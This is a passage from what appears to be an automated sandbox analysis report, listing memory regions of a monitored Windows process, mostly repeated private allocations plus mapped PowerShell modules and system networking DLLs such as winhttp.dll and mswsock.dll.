"private_0x0000025b73e60000" filename = "" Region: id = 1259 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1260 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1261 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1262 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1263 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1264 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1265 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1266 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1267 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1268 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1269 start_va = 0x25b73ea0000 end_va = 0x25b73eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73ea0000" filename = "" Region: id = 1270 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1271 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1272 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1273 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1274 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1275 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1276 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1277 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1278 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1279 start_va = 0x7fff73600000 end_va = 0x7fff7360ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73600000" filename = "" Region: id = 1280 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1281 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1282 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1283 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1284 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1285 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1286 start_va = 0x25b73ea0000 end_va = 0x25b73eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73ea0000" filename = "" Region: id = 1287 start_va = 0x25b73eb0000 end_va = 0x25b73ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73eb0000" filename = "" Region: id = 1288 start_va = 0x25b73ec0000 end_va = 0x25b73ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73ec0000" filename = "" Region: id = 1289 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1290 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1291 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1292 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1293 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1294 start_va = 0x653f110000 end_va = 0x653f14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653f110000" filename = "" Region: id = 1295 start_va = 0x25b73a10000 end_va = 0x25b73a10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 1296 start_va = 0x25b73e60000 end_va = 0x25b73e87fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 1297 start_va = 0x7fffcb9a0000 end_va = 0x7fffcc695fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\8b878fd07f8f5ac79252b31dbad69c30\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p521220ea#\\8b878fd07f8f5ac79252b31dbad69c30\\microsoft.powershell.commands.utility.ni.dll") Region: id = 1298 start_va = 0x25b73a10000 end_va = 0x25b73a15fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 1299 start_va = 0x25b73e60000 end_va = 0x25b73e87fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 1300 start_va = 0x7fff73610000 end_va = 0x7fff7361ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73610000" filename = "" Region: id = 1301 start_va = 0x25b73a10000 end_va = 0x25b73a15fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 1302 start_va = 0x25b73e60000 end_va = 0x25b73e87fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 1303 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1304 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1305 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1306 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1307 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1308 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1309 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1310 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1311 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1312 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1313 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1314 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1315 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1316 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1317 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1318 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1319 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1320 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1321 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1322 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1323 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1324 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1325 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1326 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1327 start_va = 0x25b73e90000 end_va = 0x25b73e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e90000" filename = "" Region: id = 1328 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1329 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1330 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1331 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1332 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1333 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1334 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1335 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1336 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1337 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1338 start_va = 0x7fff73620000 end_va = 0x7fff7362ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73620000" filename = "" Region: id = 1339 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1340 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1341 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1342 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1343 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1344 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1345 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1346 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1347 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1348 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1349 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1350 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1351 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1352 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1353 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1354 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1355 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1356 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1357 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1358 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1359 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1360 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1361 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1362 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1363 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1364 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1365 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1366 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1367 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1368 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1369 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1370 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1371 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1372 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1373 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1374 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1375 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1376 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1377 start_va = 0x7fff73630000 end_va = 0x7fff7363ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff73630000" filename = "" Region: id = 1378 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1379 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1380 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1381 start_va = 0x25b73e60000 end_va = 0x25b73e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e60000" filename = "" Region: id = 1382 start_va = 0x25b73e70000 end_va = 0x25b73e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e70000" filename = "" Region: id = 1383 start_va = 0x25b73e80000 end_va = 0x25b73e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73e80000" filename = "" Region: id = 1384 start_va = 0x7fffd4030000 end_va = 0x7fffd40e9fff monitored = 0 entry_point = 0x7fffd4035d90 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1385 start_va = 0x7fffdb770000 end_va = 0x7fffdb797fff monitored = 0 entry_point = 0x7fffdb77c7c0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1386 start_va = 0x7fffe5e50000 end_va = 0x7fffe5e63fff monitored = 0 entry_point = 0x7fffe5e52d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1387 start_va = 0x7fffec690000 end_va = 0x7fffec6ebfff monitored = 0 entry_point = 0x7fffec6a6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1388 start_va = 0x25b73e60000 end_va = 0x25b73f3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1389 start_va = 0x653f150000 end_va = 0x653f1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000653f150000" filename = "" Region: id = 1390 start_va = 0x7fffe9320000 end_va = 0x7fffe93e7fff monitored = 0 entry_point = 0x7fffe93613f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1391 start_va = 0x7fffe5290000 end_va = 0x7fffe52a4fff monitored = 0 entry_point = 0x7fffe5292dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1392 start_va = 0x7fffe5d70000 end_va = 0x7fffe5da7fff monitored = 0 entry_point = 0x7fffe5d88cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1393 start_va = 0x7ffff0530000 end_va = 0x7ffff0537fff monitored = 0 entry_point = 0x7ffff0531ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1394 start_va = 0x25b73f40000 end_va = 0x25b7433ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73f40000" filename = "" Region: id = 1395 start_va = 0x7fffe5bd0000 end_va = 0x7fffe5be5fff monitored = 0 entry_point = 0x7fffe5bd19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1396 start_va = 0x7fffe5bb0000 end_va = 0x7fffe5bc9fff monitored = 0 entry_point = 0x7fffe5bb2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1397 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1398 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1399 start_va = 0x25b74350000 end_va = 0x25b7435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74350000" filename = "" Region: id = 1400 start_va = 0x25b74360000 end_va = 0x25b7436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74360000" filename = "" Region: id = 1401 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1402 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1403 start_va = 0x25b74350000 end_va = 0x25b7435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74350000" filename = "" Region: id = 1404 start_va = 0x25b74360000 end_va = 0x25b7436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74360000" filename = "" Region: id = 1405 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1406 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1407 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1408 start_va = 0x25b74340000 end_va = 0x25b7434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74340000" filename = "" Region: id = 1409 start_va = 0x25b74350000 end_va = 0x25b7435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74350000" filename = "" Region: id = 1410 start_va = 0x25b74360000 end_va = 0x25b7436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b74360000" filename = "" Region: id = 1411 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1412 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1413 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1414 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1415 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1416 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1417 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: id = 1418 start_va = 0x25b73a10000 end_va = 0x25b73a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025b73a10000" filename = "" Region: 